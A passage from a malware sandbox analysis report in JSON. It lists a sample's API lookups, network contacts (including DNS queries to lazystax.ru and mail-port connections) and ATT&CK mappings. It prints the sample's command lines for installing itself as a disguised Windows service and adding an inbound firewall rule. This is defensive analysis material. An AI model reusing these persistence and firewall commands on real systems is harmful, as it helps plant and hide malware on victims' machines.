with a parameter Sleep (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalW (UID: 00000000-00004216)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitHelperDll (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CryptEnumProvidersW (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceConfigW (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpInitialize (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegisterGPNotification (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter UnregisterGPNotification (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetHashInterface (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCipherInterface (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadUILanguage (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpTerminate (UID: 00000000-00004188)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004188)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter _alldiv (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersInfo (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetIfEntry (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetBestInterface (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalA (UID: 00000000-00003600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DnsQuery_A (UID: 00000000-00003600)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e446a@ADVAPI32.dll\"\n \"0e000f00703f446a@ADVAPI32.dll\"\n \"0e000f00cc3f446a@ADVAPI32.dll\"\n \"11001200b447446a@ADVAPI32.dll\"\n \"110012004848446a@ADVAPI32.dll\"\n \"120013008c48446a@ADVAPI32.dll\"\n \"12001300e448446a@ADVAPI32.dll\"\n \"14001500dc6f446a@ADVAPI32.dll\"\n \"14001500f46f446a@ADVAPI32.dll\"\n \"140015000c70446a@ADVAPI32.dll\"\n \"170018002470446a@ADVAPI32.dll\"\n \"0d000e003c70446a@ADVAPI32.dll\"\n \"110012004c70446a@ADVAPI32.dll\"\n \"110012006070446a@ADVAPI32.dll\"\n \"0d000e003449446a@SHELL32.dll\"\n \"0d000e00b049446a@SHELL32.dll\"\n \"0f001000a071446a@ADVAPI32.dll\"\n \"14001500e071446a@ADVAPI32.dll\"\n \"14001500f871446a@ADVAPI32.dll\"\n \"0c000d004072446a@ADVAPI32.dll\"\n \"0c000d005072446a@ADVAPI32.dll\"\n \"0e000f006072446a@ADVAPI32.dll\"\n \"0e000f007072446a@ADVAPI32.dll\"\n \"0b000c008072446a@ADVAPI32.dll\"\n \"14001500b473446a@SETUPAPI.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005976)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C mkdir %WINDIR%\\system32\\pltdkegk\\\" - (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C move /Y \"%TEMP%\\jaigqlsg.exe\" %WINDIR%\\system32\\pltdkegk\\\" - (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" create pltdkegk binPath= \"%WINDIR%\\system32\\pltdkegk\\jaigqlsg.exe /d\\\"C:\\2087167d54553de4bc0b07816f\" - (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" description pltdkegk \"wifi internet conection\"\" - (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" start pltdkegk\" - (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow prog\" - (UID: 00000000-00005976)\n \"jaigqlsg.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00004216)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-275", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a named pipe", "description": "\"svchost.exe\" called \"CreateNamedPipeA\" with parameter \"\\\\.\\pipe\\uqyipjlp\"\n dwOpenMode: \"1073741827\"\n dwPipeMode: \"0\" - (UID: 00000000-00003600)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-302", "type": 9, "relevance": 3, "name": "Tries to move files", "description": "Process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\jaigqlsg.exe\" %WINDIR%\\\\system32\\\\pltdkegk\\\\\" (UID: 00000000-00006044)", "origin": "Monitored Target", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:25\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"\n \"<IPv4>:443\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"lazystax.ru\"\n \"microsoft-com.mail.protection.outlook.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41\" has an executable section named \".text\"\n \"jaigqlsg.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41\" has an writable section named \".data\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41\" has an writable section named \".text\"\n \"jaigqlsg.exe\" has an writable section named \".data\"\n \"jaigqlsg.exe\" has an writable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".reloc\" is \"0xd31000\" greater than 0x100000\n Raw size of \".reloc\" is \"0xc37000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"jaigqlsg.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched 